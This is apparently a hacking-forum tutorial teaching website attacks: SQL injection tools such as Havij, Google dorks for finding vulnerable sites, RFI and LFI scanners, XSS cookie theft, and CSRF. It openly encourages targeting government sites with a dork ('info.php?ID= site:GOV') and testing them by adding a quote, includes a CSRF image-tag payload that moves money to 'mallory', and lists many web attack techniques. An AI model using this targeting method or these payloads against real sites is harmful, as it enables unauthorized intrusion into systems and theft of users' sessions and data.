Hello I'm Injection, I've been into the Website Hacking scene for a while.

The best part of it, You could get good college or even a JOB for being a pen tester/White Hat. If you use your skill for the blackhat methods you could be the same but most likely the FEDs be after you if you try something big. This tutorial will teach you everything from the basics to the Extreme. Where do I get started? Well when I started hacking websites I learn the art of SQL. You gotta learn it manual first. Most of people laughed at you when you ask for help so here are some great explaining tutorials on it. SQL Injection Tutorial By PhortyPhour Very Detailed and Basic Full SQL Injection Tutorial By SketchSQL Injection Tutorial By kr4z1 Well have you gone over and got the basics of SQL? If so, Great! and we are going to move on how to hack websites 10x faster Manually. SQL Injection Tools are very popular and actually don't always work. If you found a big site you want to hack then do it manually. But otherwise if you want it hacked quickly your bound to use a tool probally. ' Here are some SQL Injection Tools and my personal opinion on them. (Click on the name for the direct download) Havij 1.14: This is the most common used SQL tool and many users use it. I believe it has an high success rate. But other errors its not too successful. SQL Poizon v1,1: I find this tool very useful for dork finding but I haven't used the SQL builder part yet. Thread is located Here Those are the tools I use whenever I use a tool however, They are not always successful. Finding Hackable SitesWell Google is cracking down on tools that crawl the Dorks. Dorks are your bestfriend. You have so many capibilites with them and can hack any type of site! 7,000 Dorks located Here For example, I want to go to jail. Lets hack some goverments? Okay I'm going to use the Code: info.php?ID= dork. because usually a goverment would use that on their site. Lets alter the site type. Usage: Code: info.php?ID= site:GOV

I would get government results and that dork. and just test if it is vul by adding a ' before the numbers or after:) Other Country Codes: Spoiler (Click to View) AD (Andorra) AE (UAE) AF (Afghanistan) AG (Antigua and Barbuda) AI (Anguilla) AL (Albania) AM (Armenia) AN (Netherlands) AO (Angola) AQ (Antarctica) AR (Argentina) ARPA (Arpanet) AS (American Samoa) AT (Austria) AU (Australia) AW (Aruba) AZ (Azerbaijan) BA (Bosnia and Herzegovina) BB (Barbados) BD (Bangladesh) BE (Belgium) BF (Burkina Faso) BG (Bulgaria) BH (Bahrain) BI (Burundi) BJ (Benin) BM (Bermuda) BN (Brunei Darussalam) BO (Bolivia) BR (Brazil) BS (Bahamas) BT (Bhutan) BV (Bouvet Island) BW (Botswana) BY (Belarus) BZ (Belize) CA (Canada) CC (Cocos) CF (Central African Republic) CG (Congo) CH (Switzerland) CI (Cote D'Ivoire))

CK (Cook Islands) CL (Chile) CM (Cameroon) CN (China) CO (Colombia) COM (US Commercial) CR (Costa Rica) CS (Czechoslovakia) CU (Cuba) CV (Cape Verde) CX (Christmas Island) CY (Cyprus) CZ (Czech Republic) DE (Germany) DJ (Djibouti) DK (Denmark) DM (Dominica) DO (Dominican Republic) DZ (Algeria) EC (Ecuador) EDU (US Educational) EE (Estonia) EG (Egypt) EH (Western Sahara) ER (Eritrea) ES (Spain) ET (Ethiopia) FI (Finland) FJ (Fiji) FK (Falkland) FM (Micronesia) FO (Faroe Islands) FR (France) FX (France) GA (Gabon) GB (Great Britain) GD (Grenada) GE (Georgia) GF (French Guiana) GH (Ghana) GI (Gibraltar) GL (Greenland (Island)) GM (Gambia) GN (Guinea) GOV (Government) GP (Guadeloupe) GQ (Equatorial Guinea)

GR (Greece) GS (S.Georgia and S.Sandwich Isls.) GT (Guatemala) GU (Guam) GW (Guinea-Bissau) GY (Guyana) HK (Hong Kong) HM (Heard and McDonald Islands) HN (Honduras) HR (Croatia) HT (Haiti) HU (Hungary) ID (Indonesia) IE (Ireland) IL (Israel) IN (India) INT (International) IO (British Indian Ocean Territory) IQ (Iraq) IR (Iran) IS (Iceland) IT (Italy) JM (Jamaica) JO (Jordan) JP (Japan) KE (Kenya) KG (Kyrgyzstan) KH (Cambodia) KI (Kiribati) KM (Comoros) KN (Saint Kitts and Nevis) KP (Korea (North)) KR (Korea (South)) KW (Kuwait) KY (Cayman Islands) KZ (Kazakhstan) LA (Laos) LB (Lebanon) LC (Saint Lucia) LI (Liechtenstein) LK (Sri Lanka) LR (Liberia) LS (Lesotho) LT (Lithuania) LU (Luxembourg) LV (Latvia) LY (Libya)

MA (Morocco) MC (Monaco) MD (Moldova) MG (Madagascar) MH (Marshall Islands) MIL (Military) MK (Macedonia) ML (Mali) MM (Myanmar) MN (Mongolia) MO (Macau) MP (Northern Mariana Islands) MQ (Martinique) MR (Mauritania) MS (Montserrat) MT (Malta) MU (Mauritius) MV (Maldives) MW (Malawi) MX (Mexico) MY (Malaysia) MZ (Mozambique) NA (Namibia) NASA (Nasa) NATO Nato field) NC (New Caledonia) NE (Niger) NET (Network) NF (Norfolk Island) NG (Nigeria) NI (Nicaragua) NL (Netherlands) NO (Norway) NP (Nepal) NR (Nauru) NT (Neutral Zone) NU (Niue) NZ (New Zealand) OM (Oman) ORG (Organization) PA (Panama) PE (Peru) PF (French Polynesia) PG (Papua New Guinea) PH (Philippines) PK (Pakistan) PL (Poland (Polsko))

PM (St. Pierre and Miquelon) PN (Pitcairn) PR (Puerto Rico) PT (Portugal) PW (Palau) PY (Paraguay) QA (Qatar) RE (Reunion) RO (Romania) RU (Russian Federation) RW (Rwanda) SA (Saudi Arabia) Sb (Solomon Islands) SC (Seychelles) SD (Sudan) SE (Sweden) SG (Singapore) SH (St. Helena) SI (Slovenia) SJ (Svalbard and Jan Mayen Islands) SK (Slovak Republic) SL (Sierra Leone) SM (San Marino) SN (Senegal) SO (Somalia) SR (Suriname) ST (Sao Tome and Principe) SU (USSR) SV (El Salvador) SY (Syria) SZ (Swaziland) TC (Turks and Caicos Islands) TD (Chad) TF (French Southern Territories) TG (Togo) TH (Thailand) TJ (Tajikistan) TK (Tokelau) TM (Turkmenistan) TN (Tunisia) TO (Tonga) TP (East Timor) TR (Turkey) TT (Trinidad and Tobago) TV (Tuvalu) TW (Taiwan) TZ (Tanzania)

UA (Ukraine) UG (Uganda) UK (United Kingdom) UM (US Minor Outlying Islands) US (United States(USA)) UY (Uruguay) UZ (Uzbekistan) VA (Vatican City State (Holy See)) VC (Saint Vincent and the Grenadines) VE (Venezuela) VG (Virgin Islands (British)) VI (Virgin Islands (USA) VN (Viet Nam) VU (Vanuatu) WF (Wallis and Futuna Islands) WS (Samoa) YE (Yemen) YT (Mayotte) YU (Yugoslavia) ZA (South Africa) ZM (Zambia) ZR (Zaire) ZW (Zimbabwe) Remote file inclusion Tutorial I've only found one good tutorial and its very useful. RFI means Remote file inclusion. RFI is a type of web application security hole. On the net, there are so many sites which are vulnerable to RFI. In this tutorial, I am going to show you RFI with PHP. PHP is a web script engine. Its the most widely used one so that's why I am using it in this tutorial. Learn more about PHP: http://php.net|http://en.wikipedia.org/wiki/PHP To understand what file inclusion is I am going to show a little example. This is an example site in PHP: Code: Spoiler (Click to View) This is a very basic page. But as your page expands you might want to put the individual pages in their own files and include them in the main file depending on user input. This way, when you got pages with perhaps 10k lines of PHP code you don't have to use hours looking

for the bit of code you want to edit/view. By user input I mean things like a URL GET argument. A GET argument could look like this: Code: www.site.com/index.php?page=index In the above example the PHP script would see the page=index and then show the content of index. The index can be anything, can be a file, SQL value, hard-coded variable. If it is a file, then the PHP script is most likely using the include() function and that is file inclusion. Thats just a little part. Useful tutorials: Easy RFI tutorial By SketchShell via LFI through proc/self/environ method! I'm going to Wrap up this RFI Part, Hope this part has helped you! Local File Inclusion LFI stands for Local File Inclusion LFI is very easy and very popular because of the amount of Scanners it has. I personally don't do LFI to often but when I'm bored I'll do it a couple of times. This is a must to learn if your planning to become a good website hacker. Good Tutorials: XCode LFI Scanner By Poni! Perl LFI Scanner LFI Scanners: There are so many Scanners these days so here is a few scanners that you could use. there are many scanners and each one of them might be the same. here I personally love Ponis tools they are very useful and actually work perfectly! Actually is good and I've used it. Well thats LFI. Hope you benefitted from that and enjoyed learning it. Now onto the next consept. Cross Site Scripting! Well this seems to be the Hardest to learn for some people. I myself took my along time to fully understand the entire concept. As of right now I still need knowledge on this, But who doesn't ;) XSS Means Cross Site Scripting. Yes the X is the two crossing of the lines, alot of

people don't understand that at first. Onto the main complex of XSS. XSS has two types. Persistent and Non-Persistent Non-persistent: Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information. Mallory observes that Bob's website contains a reflected XSS vulnerability. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect. Alice visits the URL provided by Mallory while logged into Bob's website. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge. Persistent attack: Mallory posts a message with malicious payload to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can now hijack Bob's session and impersonate Bob.[16] Framework: A Browser Exploitation Framework could be used to attack the web site and the user's local environment. XSS is basically using java scripts in different forms to get internet details of a users profile of big website. With the help of XSS we can steal the cookies of the owner of the website. XSS is a very large concept and your success rate depends on your imagination and experience. Like SQL Injection, keylogging are the certain things, where you follow certain steps to execute something. Where XSS is just understanding the way we can use java scripts, and the vulnerabilities of the website may be at the different places for executing your java scripts. XSS Takes awhile to get used to so don't feel lame or out of place. Useful Cross Site Scripting Tutorials:

XSS is a very fun Vulnerability because so many websites are vulnerable to it!

Cross site request forgery (CSRF): CSRF Means Cross site request forgery This is a very dangerous attack. An attack that is commonly sent by e-mail or other means and often tricks a user. Links given to a target may include HTML, something like this: Code: <img src="http://site.example/withdraw?account=bob&amount=1&for=mallory" height="1" width="1" border="0"> And this will be activated through the slave's browser and the site will think it was a valid and intentional move. More on this can be found I'm not going to explain this one too much though. So hope you learned something. Web Application Attack Techniques This list below fits in category Parameter manipulation Arbitary File Deletion Code Execution Cookie Manipulation ( meta http-equiv & crlf injection ) CRLF Injection ( HTTP response splitting ) Cross Frame Scripting ( XFS ) Cross-Site Scripting ( XSS ) Directory traversal Email Injection File inclusion Full path disclosure LDAP Injection PHP code injection PHP curl_exec() url is controlled by user PHP invalid data type error message PHP preg_replace used on user input PHP unserialize() used on user input Remote XSL inclusion Script source code disclosure Server-Side Includes (SSI) Injection SQL injection URL redirection XPath Injection vulnerability EXIF This list below fits in category MultiRequest parameter manipulation Blind SQL injection (timing)

Blind SQL/XPath injection (many types) This list below fits in category File checks 8.3 DOS filename source code disclosure Search for Backup files Cross Site Scripting in URI PHP super-globals-overwrite Script errors ( such as the Microsoft IIS Cookie Variable Information Disclosure ) This list below fits in category Directory checks Cross Site Scripting in path Cross Site Scripting in Referer Directory permissions ( mostly for IIS ) HTTP Verb Tampering ( HTTP Verb POST & HTTP Verb WVS ) Possible sensitive files Possible sensitive files Session fixation ( jsessionid & PHPSESSID session fixation ) Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc ) WebDAV ( very vulnerable component of IIS servers ) This list below fits in category Text Search Disclosure Application error message Check for common files Directory Listing Email address found Local path disclosure Possible sensitive files Microsoft Office possible sensitive information Possible internal IP address disclosure Possible server path disclosure ( Unix and Windows ) Possible username or password disclosure Sensitive data not encrypted Source code disclosure Trojan shell ( r57,c99,crystal shell etc ) ( IF ANY )Wordpress database credentials disclosure This list below fits in category File Uploads Unrestricted File Upload This list below fits in category Authentication Microsoft IIS WebDAV Authentication Bypass SQL injection in the authentication header Weak Password GHDB - Google hacking database ( using dorks to find what google crawlers have found like passwords etc )

This list below fits in category Web Services - Parameter manipulation & with multirequest Application Error Message ( testing with empty, NULL, negative, big hex etc ) Code Execution SQL Injection XPath Injection Blind SQL/XPath injection ( test for numeric,string,number inputs etc ) Stored Cross-Site Scripting ( XSS ) Cross-Site Request Forgery ( CSRF ) I Really Hope this has helped you efficiently and if you ever have any problems with anything from above please post what you are having trouble with and people will help you out and solve your problem. Thank you for reading, This has taken me several hours to complete.